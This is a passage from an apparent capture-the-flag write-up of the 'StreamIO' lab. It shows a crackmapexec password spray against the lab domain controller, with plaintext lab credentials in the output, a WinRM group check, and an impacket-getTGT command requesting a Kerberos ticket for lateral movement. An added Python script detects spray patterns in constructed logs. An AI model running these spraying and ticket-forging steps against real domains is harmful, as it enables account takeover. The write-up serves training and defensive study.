JDgodd


A successful decryption of the Firefox credential store led to compromising 4 web credentials. While the web server used for authentication suggests another possible virtual host or sub-domain (slack.streamio.htb), those decrypted credentials must first be validated, as they appear rather different from the ones seen so far.

In the following sections, a domain-wide brute-force attack is conducted against the recovered user and password lists to validate the credential of the JDgodd user.

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ crackmapexec smb dc.streamio.htb -d STREAMIO.HTB -u domain_users.txt -p passwords.txt --continue-on-success
smb         dc.streamio.htb 445    dc               [*] windows 10.0 build 17763 x64 (name:DC) (domain:STREAMIO.HTB) (signing:True) (SMBv1:False)
 
[...REDACTED...]
 
smb         dc.streamio.htb 445    dc               [+] streamio.htb\nikk37:get_dem_girls2@yahoo.com 
smb         dc.streamio.htb 445    dc               [+] streamio.htb\jdgodd:JDg0dd1s@d0p3cr3@t0r 
 
[...REDACTED...]

Password reuse confirmed: both the nikk37 and JDgodd credentials authenticate against the domain.
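From the domain controller's side, the spray above shows up in the Security log as a burst of failed logons (event 4625) against many distinct accounts from one source address within a short window, followed by a success (4624) for the accounts whose password was reused. As an added example that is not part of this write-up and is not code from any tool used here, the Python script below flags that pattern over constructed log lines; the log format, account names, IP addresses and thresholds are assumptions made for illustration.

```python
# Added example (not from the original write-up): flag a password-spray pattern
# in constructed Windows Security log lines. Log format, account names, source
# addresses and thresholds are assumptions for illustration only.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: "<timestamp> <event id> <target account> <source ip>".
# 4625 = failed logon, 4624 = successful logon. None of these values are real.
SAMPLE_LOG = """\
2024-05-01T09:00:00 4625 user01 10.0.0.99
2024-05-01T09:00:01 4625 user02 10.0.0.99
2024-05-01T09:00:01 4625 user03 10.0.0.99
2024-05-01T09:00:02 4625 user04 10.0.0.99
2024-05-01T09:00:03 4625 user05 10.0.0.99
2024-05-01T09:00:03 4624 user06 10.0.0.99
2024-05-01T09:00:04 4625 user07 10.0.0.99
2024-05-01T09:05:00 4625 user01 10.0.0.7
2024-05-01T09:05:30 4625 user01 10.0.0.7
2024-05-01T09:06:00 4624 user01 10.0.0.7
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, event_id, account, source) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, source = line.split()
        events.append((datetime.fromisoformat(ts), int(event_id), account, source))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: sorted accounts} for every source whose failed logons
    (4625) hit at least `min_accounts` distinct accounts inside one `window`.

    A single user mistyping a password fails repeatedly on ONE account; a spray
    fails once per account across MANY accounts, which is what this isolates.
    """
    by_source = defaultdict(list)
    for ts, event_id, account, source in events:
        if event_id == 4625:
            by_source[source].append((ts, account))

    flagged = {}
    for source, fails in by_source.items():
        fails.sort()
        best = set()
        start = 0
        # Sliding window over the chronologically sorted failures for this source.
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {acct for _, acct in fails[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            flagged[source] = sorted(best)
    return flagged


def successes_after_spray(events, flagged):
    """Accounts with a successful logon (4624) from a flagged source: the
    credentials the sprayer actually validated, i.e. the password-reuse victims."""
    return sorted({acct for _, event_id, acct, source in events
                   if event_id == 4624 and source in flagged})


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    hits = detect_spray(evs)
    print("spray sources:", hits)
    print("accounts validated by the spray:", successes_after_spray(evs, hits))
```

The constructed log contains one source that fails against six accounts in four seconds and a second source that only fails twice against the same account before succeeding; only the first is reported, and the follow-up 4624 from that source is what an analyst would escalate, since it marks the reused password. Thresholds should be tuned to the environment; lockout-policy-aware sprayers keep the per-account attempt count low, so distinct accounts per source, not attempts per account, is the signal.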

*evil-winrm* ps c:\> NET localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
 
Members
 
-------------------------------------------------------------------------------
Martin
nikk37
The command completed successfully.

Since the JDgodd user is not a member of the Remote Management Users group, WinRM is not an option for this account, and I would need to proceed differently from here on out.

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ impacket-getTGT streamio.htb/JDgodd@dc.streamio.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: JDg0dd1s@d0p3cr3@t0r
[*] Saving ticket in JDgodd@dc.streamio.htb.ccache

A TGT was generated for the JDgodd user and saved to the JDgodd@dc.streamio.htb.ccache file. Lateral movement to the JDgodd user is complete.